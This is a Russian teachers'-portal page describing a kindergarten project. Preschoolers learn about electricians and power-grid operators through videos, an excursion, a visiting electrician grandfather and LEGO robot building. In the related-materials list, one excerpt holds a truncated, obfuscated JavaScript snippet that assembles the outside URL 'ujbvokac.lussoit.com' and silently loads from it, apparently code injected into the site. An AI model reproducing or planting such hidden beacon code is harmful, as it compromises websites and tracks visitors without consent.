Знакомство с профессией электромонтажник и оператор электросетей посредством конструктора лего.
методическая разработка по конструированию, ручному труду (подготовительная группа)
Формирование представлений детей дошкольного возраста о мире профессий – это актуальный процесс, который необходимо строить с учётом современных образовательных технологий.
Скачать:
Вложение | Размер |
---|---|
gmo_proforientatsiya_lego.docx | 17.01 КБ |
znakomstvo_s_professiey_elektromontazhnik_i_operator_elektrosetey_posredstvom.pdf | 2.06 МБ |
Предварительный просмотр:
Знакомство с профессией электромонтажник и оператор электросетей посредством конструктора лего.
Динисламова О.П.
(Слайд 1) Формирование представлений детей дошкольного возраста о мире профессий – это актуальный процесс, который необходимо строить с учётом современных образовательных технологий. Конструирование дает возможность детям в увлекательной, активной и продуктивной деятельности обогащать свои представления о разных видах профессий. А помощь родных и близких в таком важном и ответственном деле, как приобщение детей к труду и знакомство с профессиями, очень важна и необходима. Профориентация, в первую очередь, начинается с семьи.
Осенью воспитанники подготовительной группы стали участниками конкурса Лего-фантазии. Тема, которого была «Суперизобретения». Ребятам необходимо было придумать роботов-помощников для профессий, связанных с опасностью. Но сначала, необходимо было определиться с профессией. Дети получили задание, узнать у своих родителей какие же профессии считаются опасными. И вот одна из девочек рассказала о том, что ее дедушка работает электриком. Мы решили пригласить его к нам в детский сад, чтобы ребята смогли подробнее узнать о профессии электромонтажника.
Но прежде, чем познакомить ребят с этой профессией, я задала ребятам вопрос: что такое электричество? И с чего оно началось?
(Слайд 2) Ответить на эти вопросы нам помогли развивающие фильмы об электричестве. Мы получили ответы на такие вопросы: «Где живет электричество?», «Почему электричество кусается?», «Как увидеть молнию?», «Почему наэлектризованные предметы могут двигаться?», «Почему лампочка светит?».
(Слайд 3) Вместе с родителями мы побывали на экскурсии в колледже имени П.П.Аносова, ребята смогли ближе познакомиться с данной профессией, поиграли в игры, (Слайд 4) примерили диэлектрические перчатки и обувь. (Слайд 5) Студенты показали детям мастер-класс по сбору электрической схемы.
(Слайд 6) В группе, мы попробовали сами собрать электрическую цепь, в этом нам помог электронный конструктор «Знаток».
Мы с ребятами собрали несколько моделей по предложенным в инструкции схемам.
(Слайд 7) Затем, к нам в гости пришел дедушка воспитанницы – Александр Иванович, рассказал об особенностях работы электриком, (Слайд 8) показал инструменты, (Слайд 9) дал возможность ими поработать. (Слайд 10) Ребята собрали пазлы из конструктора лего с инструментами, которые необходимы электрику. (Слайд 11) Александр Иванович подсказал, что хорошо бы придумать приспособление, которое позволит электрику без опасности подниматься и работать на высоте.
(Слайд 12) У нас получилось придумать и сконструировать 2 –ух роботов. Первый – робот подъемник, который легко поднимает электромонтажника по столбу наверх.
(Слайд 13) Второй робот позволяет работать в труднодоступных местах, например, если провода проходят над рекой. Вот такие суперизобретения мы придумали, чтобы облегчить труд электромонтажника на опасных участках.
(Слайд 14) В заключении хотелось бы еще раз обратить внимание, что воспитательно-образовательная деятельность по вопросам ранней профориентации дошкольников оказывается наиболее результативной, если осуществляется при активной поддержке родных и близких наших воспитанников.
Работа, которая проводится совместно с родителями, имеет решающее значение для воспитания у дошкольника ценностного отношения к труду взрослых, способствует большему пониманию ребенком мира профессий. Чем разнообразнее представления дошкольника о мире профессий, тем этот мир ярче и привлекательнее для него. Таким образом, дети в будущем научатся быть инициативными в выборе собственной профессии, будут проявлять активность и творчество, что поможет их дальнейшему обучению в школе.
Предварительный просмотр:
По теме: методические разработки, презентации и конспекты
Развитие познавательных способностей у детей посредством использования "Лего-конструктора".
Конструктивная деятельность занимает значимое место в дошкольном воспитании и является сложным познавательным процессом, в результате которого происходит интеллектуальное развитие детей: ребенок овлад...
Конспект образовательной деятельности по лего-конструированию «Знакомство с конструктором Лего Duplo»
laquo;Знакомство с конструктором Лего Duplo»...
Познавательное развитие дошкольников посредством использования ЛЕГО-конструктора.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'ujbvokac.lussoit.com\',\'36\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...
Знакомство с профессией "Оператор машинного доения" (доярка)
Уточнить и закрепить знания детей о домашнем животном села - корове, о том, какую пользу она приносит людям, закрепить знания детей о труде доярки, о труде других людей по уходу за животными...
ТВОРЧЕСКИЕ ВОЗМОЖНОСТИ И ТЕХНИЧЕСКИЕ РЕШЕНИЯ ПОСРЕДСТВОМ КОНСТРУКТОРА ЛЕГО.
Важная задача наших дней, подготовить детей к цифровому будущему, которое наступает все быстрее и быстрее, ведь время не стоит на месте, а технологии сменяют одна другую.Такие навыки как креативность,...
Авторская статья. Развитие технического творчества детей дошкольного возраста посредством конструктора Лего
Авторская статья. Развитие технического творчества детей дошкольного возраста посредством конструктора Лего...
Авторская статья. Развитие технического творчества детей дошкольного возраста посредством конструктора Лего
В статье представлен опыт работы детского сада по реализации парциальной программы «От Фрёбеля до робота: растим будущих инженеров». Статья будет интересна руководителям, старшим воспитате...